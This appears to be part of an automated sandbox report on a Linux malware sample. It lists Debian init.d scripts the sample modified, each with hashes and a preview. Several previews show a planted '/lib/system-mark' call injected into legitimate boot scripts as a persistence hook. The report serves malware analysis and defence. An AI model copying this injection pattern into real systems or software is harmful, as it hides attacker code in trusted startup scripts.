File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2304
Entropy (8bit):	5.099881186780916
Encrypted:	false
SSDEEP:	48:9tdVEA2+3MPMiOMdxA3Gbsbcq1himLHLHmvgjWL:9tdVEA2+3MPiI3Qbcq1Q4Hrmvt
MD5:	BD41974D1C7269BD429343943C8ED10A
SHA1:	D99E55E32229483A694B8B2EFEC8D15CF1C8FCCE
SHA-256:	56044D786BA8F4B11DDF9DBC88502ECE10246991CA383F913E9B86E57F19A28E
SHA-512:	A386FA323285EF24A9A442A5CEB8D9B2A36409B7BEC2D729031C7F83C6F3664EA1A745D35CA487A25FC953B6197F3A9FF1B35EEEFD2F90262BC2EEA7BB89D522
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: acpid.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# X-Start-Before: kdm gdm3 xdm lightdm.# X-Stop-After: kdm gdm3 xdm lightdm.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: Start the Advanced Configuration and Power Interface daemon.# Description: Provide a socket for X11, hald and others to multiplex.# kernel ACPI events..### END INIT INFO..set -e..ACPID="/usr/sbin/acpid".DEFAULTS="/etc/default/acpid"..# Check for daemon presence.[ -x "$ACPID" ] \|\| exit 0..OPTIONS="".MODULES="".# Include acpid defaults if available.[ -r "$DEFAULTS" ] && . "$DEFAULTS"..# Get lsb functions.. /lib/lsb/init-functions..# As the name says. If the kernel supports modules, it'll try to load.# the ones listed in "MODULES"..load_modules() {. [ -f /proc/modules ] \|\| return 0. if [ "$MODULES" = "all" ]; then./lib/system-mark. MODULES="$(sed -rn 's#^(/lib/mod

/etc/init.d/alsa-utils

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	5694
Entropy (8bit):	5.4204403708834565
Encrypted:	false
SSDEEP:	96:iKtDd9/iwmDaLEuE9nwsmFRzF+rc17NyppyhHk5eEkv:iCdlW6EuUnZeRB+rc15yryZkq
MD5:	14EB05544D93BC0B09262334CCB79F2C
SHA1:	620AC9E2B5A23703A568800376CE590445FDFBD5
SHA-256:	C52ED6032904A94A0B83DCD1CDFA83D48DA29D049A5F29BB90265492120183E4
SHA-512:	83DCDC085FBFEEC1843D8C5E8978162AA34F9ECD0E7BF4E8BBF8D8D005837FF6A69F56BF7988400CB5AF07A5AF63D6471BD8BC2DAE223CDA3500F07B0EE9C36B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.#.# alsa-utils initscript.#.### BEGIN INIT INFO.# Provides: alsa-utils.# Required-Start: $local_fs $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Restore and store ALSA driver settings.# Description: This script stores and restores mixer levels on.# shutdown and bootup.On sysv-rc systems: to.# disable storing of mixer levels on shutdown,.# remove /etc/rc[06].d/K50alsa-utils. To disable.# restoring of mixer levels on bootup, rename the.# "S50alsa-utils" symbolic link in /etc/rcS.d/ to.# "K50alsa-utils"..### END INIT INFO..# Don't use set -e; check exit status instead..# Exit silently if package is no longer installed.[ -x /usr/sbin/alsactl ] \|\| exit 0..PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin.MYNAME=/etc/init.d/alsa-utils.ALSACTLHOME=/run/alsa..[ -d "$ALSA

/etc/init.d/anacron

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2124
Entropy (8bit):	4.760217966755678
Encrypted:	false
SSDEEP:	24:aiF8WzzU+LuN5K6YqfOv5i1CPeFecyZR11s+M8k93ILlfWW6910kF4T0Op:7RzgTNNOhi1eAryZR1vX5fTKX00+
MD5:	B8F9EF2F7B8875CFEE672094FF6B7829
SHA1:	901405E0A0F9AF0D39010FB609E06A34FA9918F5
SHA-256:	11696FDED80A45C7CD5351D01D0C4419E69A863C3774F7F37C3FD22F22F3EE16
SHA-512:	A90371D6664E9043A8FD43A8138B245C228AFF9E64AC6A41D73C849C0CF746ABFAEABB2C1D2BEEBBC05D7451A2B84DAE4E80A0BDF64864A390FE950437CB4745
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: anacron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Run anacron jobs.# Description: The first purpose of this script is to run anacron at.# boot so that it can catch up with missed jobs. Note.# that anacron is not a daemon. It is run here just once.# and is later started by the real cron. The second.# purpose of this script is that said cron job invokes.# this script to start anacron at those subsequent times,.# to keep the logic in one place..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin..test -x /usr/sbin/anacron \|\| exit 0.test -r /etc/default/anacron && . /etc/default/anacron... /lib/lsb/init-functions..case "$1" in. start). if init_is_upstart 2>/dev/null; then./lib/system-mark. exit 1. fi. log_daemon_msg "Starting

/etc/init.d/apparmor

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3826
Entropy (8bit):	5.249219751257144
Encrypted:	false
SSDEEP:	96:RFCjnn83hjz3n1zJNSNuDNBqNPoNpMbANEF7gG9M3zRVhszRVhxRl:Wjn4hj779Gjl
MD5:	DE4607EB984BD8C2751A19FED2566718
SHA1:	B605ED61D40829230C99D2C54B401CD2E154DE20
SHA-256:	F6BC11FE360F4DB66CB6B1C7763DC087E5D8F76A7D8145F08F617FD10C4FBFFD
SHA-512:	D932550ED8287788D8E14165CB47EB3A649D40B8AE6E8EEEC6ADCCC3563D8B376BBDE5C804205BD9B174CC3786154292C2D352307F41D9649312D9BF615DFD0C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# ----------------------------------------------------------------------.# Copyright (c) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007.# NOVELL (All rights reserved).# Copyright (c) 2008, 2009 Canonical, Ltd..#.# This program is free software; you can redistribute it and/or.# modify it under the terms of version 2 of the GNU General Public.# License published by the Free Software Foundation..#.# This program is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with this program; if not, contact Novell, Inc..# ----------------------------------------------------------------------.# Authors:.# Steve Beattie <steve.beattie@canonical.com>.# Kees Cook <kees@ubuntu.com>.#.# /etc/init.d/app

/etc/init.d/apport

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3050
Entropy (8bit):	5.216428196190724
Encrypted:	false
SSDEEP:	48:jV/OxxHuoBusZABLm/tiUmZmNndBuSZWg/e/fuppzDGdxboGxz5:jV/OxNDBusZABLm1BmOnbuSZWg2/anOT
MD5:	FB82D03D336FC2AC2901C9D28682B408
SHA1:	992649B4B941B5B5372A6215DA4A5231BFDCD0BF
SHA-256:	F9AFCA8A53AF95CC19F4D1D2495F80335924F5C65ABE9147C5D46AE29CBEC76C
SHA-512:	8EE7107F9FCB458989553B871B06823646B765980D7BBF84C7110C0FFEA116DE7D141D5FE21BA2CFDBCA9A423434AE276D3949AB6EF1EACED8DEF7DFE6D16C40
Malicious:	true
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides: apport.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: automatic crash report generation.### END INIT INFO..DESC="automatic crash report generation".NAME=apport.AGENT=/usr/share/apport/apport.SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$AGENT" ] \|\| exit 0..# read default file.enabled=1.[ -e /etc/default/$NAME ] && . /etc/default/$NAME \|\| true..# Define LSB log_* functions..# Depend on lsb-base (>= 3.0-6) to ensure that this file is present... /lib/lsb/init-functions..#.# Function that starts the daemon/service.#.do_start().{..# Return..# 0 if daemon has been started..# 1 if daemon was already running..# 2 if daemon could not be started...[ -e /var/crash ] \|\| mkdir -p /var/crash..chmod 1777 /var/crash...# check for kernel crash dump, convert it to apport report..if [ -e /var/crash/vmcore ] \|\| [ -n "`ls /va

/etc/init.d/avahi-daemon

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2453
Entropy (8bit):	4.851897064111941
Encrypted:	false
SSDEEP:	48:9s2V+ig+Ui83MZoJQukTS9VC2/ulMA0uv3uKv2ZsGyjyRft/zsDE7Ed:93oijU4ukTSZux0uv3uKvdJORlADHd
MD5:	84273238ABAA8A7DE2D516C95D92F171
SHA1:	875222E1EE9FE460931E5340C94F958D1DB14C9D
SHA-256:	2BDB658E48A470E440378BC4BC4CC48B9B228BC3DF759187787A7D9FD71EEC90
SHA-512:	C226B5813A17D0640FBC77D09889F19F638FF9701CCC2E933B3DC8749674BC1918FD22011096126FEBBBBF55F91BE1D78DF8CC176D4465BA4A2426414C2D1D88
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: avahi avahi-daemon.# Required-Start: $remote_fs dbus.# Required-Stop: $remote_fs dbus.# Should-Start:. $syslog.# Should-Stop: $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Avahi mDNS/DNS-SD Daemon.# Description: Zeroconf daemon for configuring your network .# automatically.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC="Avahi mDNS/DNS-SD Daemon".NAME="avahi-daemon".DAEMON="/usr/sbin/$NAME".SCRIPTNAME=/etc/init.d/$NAME..# Gracefully exit if the package has been removed..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..# Include avahi-daemon defaults if available..test -f /etc/default/avahi-daemon && . /etc/default/avahi-daemon..DISABLE_TAG="/var/run/avahi-daemon/disabled-for-unicast-local"..#.# Function that starts the daemon/service..#.d_start() {. $DAEMON -c && return 0.. if [ -e $DISABLE_TAG -a "$AVAHI_DAEMON_DETECT_LOCAL" !=

/etc/init.d/binfmt-support

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	5.0501124070839
Encrypted:	false
SSDEEP:	24:ai3V6yXngSBVSBNyj6edNHcBcN6ekvx2w5mw+76opC:73ZngWVWNMNH0Y6bJ2w4wrJ
MD5:	A79B82CEAEE457E62E6EA7BAF7D1CAE5
SHA1:	B1EEBF3A9994B719F88E63BAC51A40EF3E3A4082
SHA-256:	76950791A135F0DFCCBE3A246A8085304345B40AC3DFE30BF1CA53C6BF81FD95
SHA-512:	4B6A9CEAEAC8952255DA0EAED35DAB689D80D3BD2B7D69CF3BF36D36271CCA309114D3E32C6C6797143C991DF1EAEB6491A7A36DE6AF9633F71AECB4B3D40C4E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: binfmt-support.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Support for extra binary formats.# Description: Enable support for extra binary formats using the Linux.# kernel's binfmt_misc facility..### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=binfmt-support.DESC="additional executable binary formats"..if [ "$(uname)" != Linux ]; then./lib/system-mark. exit 0.fi..which update-binfmts >/dev/null 2>&1 \|\| exit 0... /lib/lsb/init-functions.[ -r /etc/default/rcS ] && . /etc/default/rcS..set -e.CODE=0..case "$1" in. start). log_daemon_msg "Enabling $DESC" "$NAME". update-binfmts --enable \|\| CODE=$?. log_end_msg $CODE. exit $CODE. ;;.. stop). log_daemon_msg "Disabling $DESC" "$NAME". update-binfmts --disable \|\| CODE=$?. log_end_msg $CODE. exi

/etc/init.d/bluetooth

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3071
Entropy (8bit):	5.403760092319036
Encrypted:	false
SSDEEP:	48:71OoPrcMbC/BUUzGrm92+kbM935LmiVQoOZoKkkFjM+Zh9YDFjMrfOte:79TcWC/BUeem92R4V5LROt5r9CE2A
MD5:	E001FF7DBF2452314EEC95D08540D7AF
SHA1:	B2B63E00B1685EAA0DACC4D5F2C07C15F0D6AE55
SHA-256:	D6AA950CFA0BA62353E3734AB3E43F1B402C1B7F95CAC3C5D99D8453D299BDF3
SHA-512:	A9EA2F92C5A94330041228C7AECEB44718EBA47017ED7A41DEC87D6EAD6D7B34F968A79CFCFDDCC38561D964D354BFB63F3F52C2EFEE76C38C80DECCEC2FA944
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: bluetooth.# Required-Start: $local_fs $syslog $remote_fs dbus.# Required-Stop: $local_fs $syslog $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Start bluetooth daemons.### END INIT INFO.#.# bluez Bluetooth subsystem starting and stopping.#.# originally from bluez's scripts/bluetooth.init.#.# Edd Dumbill <ejad@debian.org>.# LSB 3.0 compilance and enhancements by Filippo Giunchedi <filippo@debian.org>.#.# Updated for bluez 4.7 by Mario Limonciello <mario_limonciello@dell.com>.# Updated for bluez 5.5 by Nobuhiro Iwamatsu <iwamatsu@debian.org>.#.# Note: older daemons like dund pand hidd are now shipped inside the.# bluez-compat package..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC=bluetooth..DAEMON=/usr/sbin/bluetoothd.HCIATTACH=/usr/bin/hciattach..BLUETOOTH_ENABLED=0.HID2HCI_ENABLED=1.HID2HCI_UNDO=1..SDPTOOL=/usr/bin/sdptool..# If you want to be ignore error of "org.freedesktop.hostname1",.# please en

/etc/init.d/console-setup.sh

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1301
Entropy (8bit):	4.3356283043101165
Encrypted:	false
SSDEEP:	24:9lBiePItKzeBcx2o8/z3ejhTJckS5gzjdJwZWkZg7zcOqb6:93PyKzYcg/LshTJckS5gJw8kG7A9b6
MD5:	FE88F57D8990408CAAF7688C8EB6D734
SHA1:	7160510037CCA5505F40EFBE4CE8CCC777EAECE3
SHA-256:	C01D230B67C35FB75446E7A4599A09751E8859A4462CD5EB34DF9F186B28049F
SHA-512:	3DDA7EAF95F80FD3E35D8FDBF9AB77126E2CBF39CAA5C7A1275227D5267683F43504B191F0E08E901F93667AAFEE1F21F79BA3C8A27D5622C990DAA3AE39583D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: console-setup.sh.# Required-Start: $remote_fs.# Required-Stop:.# Should-Start: console-screen kbd.# Default-Start: 2 3 4 5.# Default-Stop:.# X-Interactive: true.# Short-Description: Set console font and keymap.### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system-mark. case "$1" in. stop\|status). # console-setup isn't a daemon. ;;. start\|force-reload\|restart\|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system-mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {.. if [ "$1" -eq 0 ]; then./lib/system-mark.. echo done... else.. echo failed... fi. }. fi. log_action_begin_msg "Setting up console font and keymap". if /li

/etc/init.d/cron

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3111
Entropy (8bit):	4.911661386459712
Encrypted:	false
SSDEEP:	48:5PMic6MicW4dJIrcz8WD23fK2LAb38CE1ATGuMoZisTdDKoA3gHMLf:5E3s4dJWRWD23y2LgsZCTHMnidD/A3gU
MD5:	0E0A4A7372459B9C2D8F45BAA40A64B3
SHA1:	6DEAF952235F89CBDD83FBE48C89A4F048E52043
SHA-256:	2B88ED8EFDF3262040903719AA03156C8CD73B50CF2F2FCCACB33693FE4110D6
SHA-512:	4E11C50B5F5D95CAE5B374C4597DD83F79434876598BD9C5FC32D37B765885DC1FF920D96D6594E548F08DC9D367D8C74F704C9BA49056749E5A3B4CD6D13C50
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# Start/stop the cron daemon..#.### BEGIN INIT INFO.# Provides: cron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Should-Start: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Should-Stop: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Regular background program processing daemon.# Description: cron is a standard UNIX program that runs user-specified .# programs at periodic scheduled times. vixie cron adds a .# number of features to the basic UNIX cron, including better.# security and more powerful configuration options..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DESC="cron daemon".NAME=cron.DAEMON=/usr/sbin/cron.PIDFILE=/var/run/crond.pid.SCRIPTNAME=/etc/init.d/"$NAME"..test -f $DAEMON \|\| exit 0... /lib/lsb/init-functions..[ -r /etc/default/cr

/etc/init.d/cryptdisks

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	955
Entropy (8bit):	5.160229628002615
Encrypted:	false
SSDEEP:	12:aiy4BTty5r2MVOc4qVp1b7NBq2dS1uaqLgcIcrPcrmjcdpEMyuDHkkGKErIKDq7p:aiVT5MQsL1bPq2MKZcr/ZkVyKDpjQ
MD5:	3B43339B088088E5B725575549A61F55
SHA1:	98AF37D27DC1A2EFE51AD74366137D375E631BB3
SHA-256:	BF85CED45A7B48892F49D608E189307CC08330A4F2834289B847B457DFD7D28A
SHA-512:	AF7347AEE4625DBD7C23A9A411362EC940B17DBBA794E9B89DC37D893EBCB445044BDB52D21197DBCEF73C75CF697E935D729110A2125D168E82D6B5E24938FC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks.# Required-Start: checkroot cryptdisks-early.# Required-Stop: umountroot cryptdisks-early.# Should-Start: udev mdadm-raid lvm2.# Should-Stop: udev mdadm-raid lvm2.# X-Start-Before: checkfs.# X-Stop-After: umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup remaining encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system-mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="remaining".DEFAULT_LOUD="yes"..case "$CRYPTDISKS_ENABLE" in.[Nn])..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart\|reload\|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.)..echo "Usage: cryptdisks {start\|stop\|restart\|reload\|force-reload\|force-start}"..exit 1..;;.esac..

/etc/init.d/cryptdisks-early

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	914
Entropy (8bit):	5.158660421998386
Encrypted:	false
SSDEEP:	12:aiy2BTCZN2MVW4qVS5sNBq2dX9qLgcIcrPcrmZm2dpBdMyuDHkkGKErIKDq7URuL:ai/TTMkw5Mq2CeKYZkVyKDvjQ
MD5:	905C0E1E5CC6FFC62CA21752E3F1753E
SHA1:	8810356FC23199F23631A7656815A431E34C4C1A
SHA-256:	6418AB31DBC9A1222A89C3D896C534373D9CB2D8D5D42FC75699889979E0AC34
SHA-512:	C7735CFB23C6CC924E7B55D825F352EBFB86CAEA48DF358499EF294EBE82F49F325F3C1098AA717BA622A8545E9A116C2648B44E2066597C5D4A37E71E6F77F8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks-early.# Required-Start: checkroot.# Required-Stop: umountroot.# Should-Start: udev mdadm-raid.# Should-Stop: udev mdadm-raid.# X-Start-Before: lvm2.# X-Stop-After: lvm2 umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup early encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system-mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="early".DEFAULT_LOUD=""..case "$CRYPTDISKS_ENABLE" in.[Nn])..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart\|reload\|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.)..echo "Usage: cryptdisks-early {start\|stop\|restart\|reload\|force-reload\|force-start}"..exit 1..;;.esac..

/etc/init.d/cups

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2856
Entropy (8bit):	5.2245818519394565
Encrypted:	false
SSDEEP:	48:76MLNMwmbAzAZVCoLqLVO1Z6NH/qAh1UoAaYmUoG/FVv/FkG/UoG/F1RetsJ:7BWwmEMZVChFB7UoAaZUoGDvuG/UoGr/
MD5:	A13A7862BD0038FC523BFDFD69743E21
SHA1:	02BDC079157F4E2DF13C4CD4EF92BF477512348E
SHA-256:	0B82721F8B1FA32F5D25FE373FCD6DC540296675AFAD5C04A0EA18C4855DF29D
SHA-512:	4856AEFE6C5516CD19438DAD4689B3D656BA0ACFD0E498ABDA54628E1287B2C9C340040799C5B8AE68DA67970E19B41264E0F7C0416108E53D6477F5F18C7AC9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cups.# Required-Start: $syslog $remote_fs.# Required-Stop: $syslog $remote_fs.# Should-Start: $network avahi-daemon slapd nslcd.# Should-Stop: $network.# X-Start-Before: samba.# X-Stop-After: samba.# Default-Start: 2 3 4 5.# Default-Stop: 1.# Short-Description: CUPS Printing spooler and server.# Description: Manage the CUPS Printing spooler and server;.# make it's web interface accessible on http://localhost:631/.### END INIT INFO..# Author: Debian Printing Team <debian-printing@lists.debian.org>..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/cupsd.NAME=cupsd.PIDFILE=/run/cups/$NAME.pid.DESC="Common Unix Printing System".SCRIPTNAME=/etc/init.d/cups..unset TMPDIR..# Exit if the package is not installed.test -x $DAEMON \|\| exit 0..mkdir -p /run/cups/certs.[ -x /sbin/restorecon ] && /sbin/restorecon -R /run/cups..# Define LSB log_* functions..

/etc/init.d/cups-browsed

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1979
Entropy (8bit):	5.144887658077899
Encrypted:	false
SSDEEP:	48:7mU3mK7xpvyCKyhfPV5upSYf54v6YSBFQJvFS2b:7j3FpjhnV5upSYuv3ScJQ2b
MD5:	B6B52BC4EBC4D496D01B30E2CFCF2C62
SHA1:	0221F156258ED821216CBF81280EE6324BDD52E9
SHA-256:	62B6CC632C9AC071EF72CDEB7057A4B20B7AE17413A289AEC43A67162B20A989
SHA-512:	B6FD6007E039984D1E505A62C76BB3373F3AF4A4DCB7E1AB7E2DF5C66D9D2F87DEB3DE2DEE97DF8FC33E9F94975B64DF03049C4DF60A1F02FADF4D5A7F6D4ED8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cups-browsed.# Required-Start: $syslog $remote_fs $network $named $time.# Required-Stop: $syslog $remote_fs $network $named $time.# Should-Start: avahi-daemon.# Should-Stop: avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: cups-browsed - Make remote CUPS printers available locally.# Description: This daemon browses Bonjour broadcasts of shared remote CUPS.# printers and makes these printers available locally by creating.# local CUPS queues pointing to the remote queues. This replaces.# the CUPS browsing which was dropped in CUPS 1.6.1. For the end.# the behavior is the same as with the old CUPS broadcasting/.# browsing, but in the background the standard method for network.# service announcement and discovery, Bonjour, is used..### END INIT INFO..DAEMON=/usr/sbin/cups-browsed.NAME=cups-browsed.PIDFIL

/etc/init.d/dbus

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, Unicode text, UTF-8 text executable
Category:	dropped
Size (bytes):	3255
Entropy (8bit):	5.118926067111819
Encrypted:	false
SSDEEP:	96:9JOxbyAn/JNsQmx+xZRGWoGUuK2gY5W7zTXmgI:9Jw2U1MSIr7nXmL
MD5:	B05B34CA2A32E2007677F6CD40C3AF66
SHA1:	48F6C6EC5AE325D1E72224E27E98DE1CF817C521
SHA-256:	6C0251B0D84D116413A6DEF3B4D1699017BE1114E025B5E7E4B546237209574E
SHA-512:	692CE95159E6677954A6E573ADCDC5BFF11301E37CF25501F7205164CC2F4D24B6758663BE5ABD680EEC2E22C08AA491CEC269DDB696AC2D4EF99798CBC30495
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: dbus.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: D-Bus systemwide message bus.# Description: D-Bus is a simple interprocess messaging system, used.# for sending messages between applications..### END INIT INFO.# -- coding: utf-8 --.# Debian init.d script for D-BUS.# Copyright . 2003 Colin Walters <walters@debian.org>.# Copyright . 2005 Sjoerd Simons <sjoerd@debian.org>..set -e..DAEMON=/usr/bin/dbus-daemon.UUIDGEN=/usr/bin/dbus-uuidgen.UUIDGEN_OPTS=--ensure.NAME=dbus.DAEMONUSER=messagebus.PIDDIR=/var/run/dbus.PIDFILE=$PIDDIR/pid.DESC="system message bus"..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..# Source defaults file; edit that file to configure this script..PARAMS="".if [ -e /etc/default/dbus ]; then./lib/system-mark. . /etc/default/dbus.fi..create_machineid() {. # Create machine-id file. i

/etc/init.d/gdm3

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3102
Entropy (8bit):	5.042976496573067
Encrypted:	false
SSDEEP:	48:78unF1gLpxNlduwTebFGBzB4ndfPaMa59zqKN/UsCVADsZvOsFzmxOsFC2WtFji:7dnM1XV3B2dUdaVAGvoe2Wtc
MD5:	34C249DFA3336DB31FBE66E1CD5758F6
SHA1:	4B86122506102F1A88F72FF6D83C8E32B88F9D1E
SHA-256:	EE131550054FD4C8053F1C139C7F96CDBA8FD3F7CCFA78C1ED87DDD4FFC10D47
SHA-512:	B88FE306642B0757B24110D43BFF4A286D24C1995C0E6C3E9429E85E51D9D9DD4150BB4F99F818EDBC3CF2AFB2F9CE30CB1E7928B15CF8D41ADC330D3F0C58F3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: gdm3.# Should-Start: console-screen dbus network-manager.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: GNOME Display Manager.# Description: Debian init script for the GNOME Display Manager.### END INIT INFO.#.# Author: Ryan Murray <rmurray@debian.org>.#.set -e..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/gdm3.PIDFILE=/var/run/gdm3.pid..test -x $DAEMON \|\| exit 0..if [ -r /etc/default/locale ]; then./lib/system-mark. . /etc/default/locale. export LANG LANGUAGE.fi... /lib/lsb/init-functions..# To start gdm even if it is not the default display manager, change.# HEED_DEFAULT_DISPLAY_MANAGER to "false.".HEED_DEFAULT_DISPLAY_MANAGER=true.DEFAULT_DISPLAY_MANAGER_FILE=/etc/X11/default-display-manager..activate_logind() {. # Try to dbus activate logind to avoid a race conditions if we are not. # runnin

/etc/init.d/hddtemp

Download File

Process:	/tmp/fL4E1jNVCt.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3163
Entropy (8bit):	5.259424339682965
Encrypted:	false
SSDEEP:	48:ietQlU+vdYb5tM7yL7yi47yIrrF9o6YRK50JDRABzNJuhCv8Z//UZJ7iuh052m3s:FtQlTd65tp6iN0oLRsQaAsUkho2mc
MD5:	78C631FF42D0225229009886F9999B56
SHA1:	4FAEF5CD07FC43C3AE00A1D09116580664EB9158
SHA-256:	0EA1C7D35BA69FB47D9AF56AA7FEEA00CC2F0A0F1ACB5796C48D4BB95F980D9E
SHA-512:	DF5DE7A268F0FFB5C6E95A32128877AAB05EA46331471D95E97DD4A31B883D0B9DE9005EC995F37AA254BEFE27A252961FF37148BB3E7896E30373FC16F96D84
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
